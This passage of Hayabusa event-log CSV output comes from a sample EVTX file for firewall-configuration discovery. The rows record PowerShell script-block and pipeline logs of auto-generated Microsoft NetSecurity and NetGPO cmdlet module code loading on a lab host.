'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_method",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Parameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetGPO ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object 